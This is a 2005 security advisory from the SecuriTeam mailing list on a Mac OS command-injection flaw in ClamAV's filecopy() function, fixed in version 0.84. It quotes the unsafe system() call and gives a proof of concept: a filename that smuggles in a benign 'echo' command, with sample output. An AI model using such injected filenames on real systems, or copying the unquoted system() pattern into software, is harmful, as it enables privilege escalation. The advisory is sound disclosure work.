[NEWS] ClamAV Local Privilege Escalation (MacOS)

From: SecuriTeam (support_at_securiteam.com)
Date: 05/31/05

  • Next message: SecuriTeam: "[NEWS] D-Link 504T/604T Remote Access"
    To: list@securiteam.com
    Date: 31 May 2005 19:06:08 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      ClamAV Local Privilege Escalation (MacOS)
    ------------------------------------------------------------------------

    SUMMARY

    " <http://www.clamav.net/abstract.html> Clam AntiVirus is a GPL anti-virus
    toolkit for UNIX. The main purpose of this software is the integration
    with mail servers (attachment scanning). The package provides a flexible
    and scalable multi-threaded daemon, a command line scanner, and a tool for
    automatic updating via Internet. The programs are based on a shared
    library distributed with the Clam AntiVirus package, which you can use
    with your own software."

    A vulnerability was discovered in ClamAV, exploiting this vulnerability
    allows a local attacker on a MacOS system to elevate privileges to that of
    a user running a ClamAV process.

    DETAILS

    Vulnerable Systems:
     * ClamAV versions 0.80rc4 through 0.84rc2

    Immune Systems:
     * ClamAV versions 0.84 and newer

    Under the Mac OS file system (HFS) files are saved as to parts data and
    resource fork. In ClamAV version 0.80rc4, support was added to copy both
    the data and the resource fork when moving a virus infected file. The
    mechanism they used was the Mac local system utility ditto. While there
    isn't a security issue with using the "ditto" command itself, the system()
    call they use to execute it is insecure.

    From the function filecopy(), in the file shared/misc.c:
    ..
    #ifdef C_DARWIN
        /* On Mac OS X use ditto and copy resource fork, too. */
        char *ditto = (char *) mcalloc(strlen(src) + strlen(dest) + 30,\
                                       sizeof(char));
        sprintf(ditto, "/usr/bin/ditto --rsrc %s %s", src, dest);

        if(system(ditto)) {
            free(ditto);
            return -1;
        }
    ..

    This code does not check the filename for shell special characters, or
    quote existing ones. If a file name contains an embedded shell command the
    system() will execute it as the ClamAV current UID.

    Example:
    An example attack is as follows:
    Download a test virus <http://www.eicar.org/download/eicar.com>
    http://www.eicar.org/download/eicar.com

    And rename it like so:
    $ mv eicar.com \;echo\ \"test\"\;

    If the clam user does not have permissions to remove the file it will try
    and copy the file and the resource fork via the ditto system call. The
    command it will execute in this case is:
    system("/usr/bin/ditto -rsrc ;echo "test"; /tmp/;echo "test" ");

    The shell will interpret the ';echo "test"; 's a separate command and
    execute it. The following is some sample output:
    $ sudo -u nobody clamscan . --debug --move=/tmp
    ..
    LibClamAV debug: Eicar-Test-Signature found in descriptor 6.
    /;echo "test";: Eicar-Test-Signature FOUND
    usage: ditto [ <options> ] src [ ... src ] dst
        <options> are any of:
        -v print a line of status for each src copied
        -V print a line of status for every file copied
        -X do not descend into directories with a different
                        device ID
        -c create a CPIO archive at dst
        -x unpack the CPIO archives at src...
        -z CPIO archives are compressed
        -k archives are PKZip format
        --keepParent parent directory of src is embedded in dst

        --arch archVal fat files will be thinned to specified archVal
                        multiple -arch options can be specified
                        archVal should be one of "ppc", "i386", etc
        --bom bomFile only files present in the specified bom are copied
        --rsrc copy preserving resource data
        --sequesterRsrc copy resources via polite directory (PKZip only)
    test
    ..

    The usage statement above is produced because in this case, ditto's call
    doesn't have the correct command line options. Afterward, "test" is
    printed, as expected.

    The conditions under which this can be exploited are very limited. A
    ClamAV process must be configured to move files to a quarantine in order
    for the ditto call to be used. In addition, this call only appears to be
    used if a file move operation fails, at which point the file is then
    copied. Once again, due to the #define used in the affected function, only
    Mac OS installations are affected.

    Disclosure Timeline:
    31.03.05 - Initial Discovery
    03.04.05 - ClamAV Team Notified
    29.04.05 - Version 0.84 Released
    27.05.05 - Public Disclosure

    ADDITIONAL INFORMATION

    The information has been provided by
    <mailto:tim-security@sentinelchicken.org> Tim.
    The original article can be found at:
    <http://www.sentinelchicken.com/advisories/clamav/>
    http://www.sentinelchicken.com/advisories/clamav/

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[NEWS] D-Link 504T/604T Remote Access"

    Relevant Pages

    • [NEWS] ClamAV Multiple Vulnerabilities (Temporary Files, UUEncode)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... ClamAV Multiple Vulnerabilities ... which should be relatively easy to be guessed by the attacker is used, ... Beside others, UUEncoded files are supported, too. ...
      (Securiteam)
    • [UNIX] Clam AntiVirus Multiple DoS
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Exploitation of a design error in Clam AntiVirus ClamAV allows attackers ... If this function is called with a length value of zero, an infinite loop ... constructed CAB file through a mail gateway or personal anti-virus client ...
      (Securiteam)
    • [NEWS] ClamAV libclamav PE File Integer Overflow Vulnerability
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... ClamAV libclamav PE File Integer Overflow Vulnerability ... Exploitation of this vulnerability results in the execution of arbitrary ...
      (Securiteam)
    • [NEWS] ClamAV libclamav PeSpin Heap Overflow Vulnerability
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... ClamAV libclamav PeSpin Heap Overflow Vulnerability ... Exploitation of this vulnerability results in the execution of arbitrary ...
      (Securiteam)
    • [UNIX] Clam AntiVirus ClamAV CAB File Unstore Buffer Overflow Vulnerability
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Clam AntiVirus ClamAV CAB File Unstore Buffer Overflow Vulnerability ... Remote exploitation of a buffer overflow vulnerability in Clam AntiVirus' ...
      (Securiteam)